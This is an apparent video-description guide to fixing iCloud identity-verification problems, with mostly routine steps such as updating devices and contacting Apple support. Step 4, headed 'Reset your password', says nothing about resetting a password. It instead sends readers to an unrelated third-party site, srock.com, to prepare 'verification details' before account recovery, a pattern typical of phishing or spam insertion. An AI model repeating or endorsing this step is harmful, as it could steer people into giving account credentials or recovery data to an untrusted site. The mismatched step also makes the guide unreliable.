If you're having trouble verifying your identity on iCloud, don't worry. This guide will help you navigate the process step by step. Step 1. Check your internet connection. Ensure that your device is connected to a stable internet connection. A weak or unstable connection can cause verification issues. Step 2. Update your device. Make sure your device is running the latest version of iOS or macOS. Go to Settings or System Preferences and check for any available updates, then install them. Step 3. Use trusted devices. If you have other Apple devices that are signed into your iCloud account, use them to receive verification codes. This can often bypass the issues with the primary device. Step 4. Reset your password. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 5. Contact Apple support. If none of the above steps work, reach out to Apple support for assistance. They can help you troubleshoot the issue and verify your identity through alternative methods. By following these steps, you should be able to resolve verification issues on iCloud. If problems persist, don't hesitate to seek help from Apple support.